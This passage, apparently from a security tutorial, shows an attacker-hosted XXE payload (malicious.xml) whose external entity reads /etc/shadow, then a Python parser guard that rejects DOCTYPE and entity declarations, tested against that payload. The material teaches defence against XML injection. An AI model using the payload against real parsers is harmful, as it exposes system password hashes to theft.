He then hosts the malicious XML file on his own server as part of the trap.
malicious.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
  <!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
  &passwords;
</xrds>
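A consumer of remotely hosted XML can refuse a file like this before any entity is resolved. The sketch below is an added example, not code from the original page; the function names and the benign sample document are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when an untrusted document carries a DTD or entity declaration."""


def _reject(kind):
    # Build an expat handler that aborts parsing as soon as it fires.
    def handler(*args):
        raise ForbiddenXML(f"{kind} not allowed in untrusted XML")
    return handler


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse remotely fetched XML, refusing DOCTYPE and entity declarations."""
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject("DOCTYPE")
    guard.EntityDeclHandler = _reject("entity declaration")
    guard.ExternalEntityRefHandler = _reject("external entity reference")
    guard.Parse(data, True)        # raises before any entity is expanded
    return ET.fromstring(data)     # only reached for DTD-free documents


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted(data)
    except ForbiddenXML:
        return True
    return False


# The malicious.xml shown above, byte for byte on one line.
MALICIOUS = (b'<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xrds [ '
             b'<!ENTITY passwords SYSTEM "file://etc/shadow"> ]> '
             b'<xrds> &passwords; </xrds>')

# Constructed benign document with the same root element and no DTD.
BENIGN = (b'<?xml version="1.0" encoding="utf-8"?>'
          b'<xrds><URI>https://op.example/endpoint</URI></xrds>')

if __name__ == "__main__":
    print("malicious.xml rejected:", is_rejected(MALICIOUS))
    print("benign root element:", parse_untrusted(BENIGN).tag)
```

Rejecting the DOCTYPE outright, rather than trying to filter individual entities, means the parser never sees a SYSTEM identifier at all.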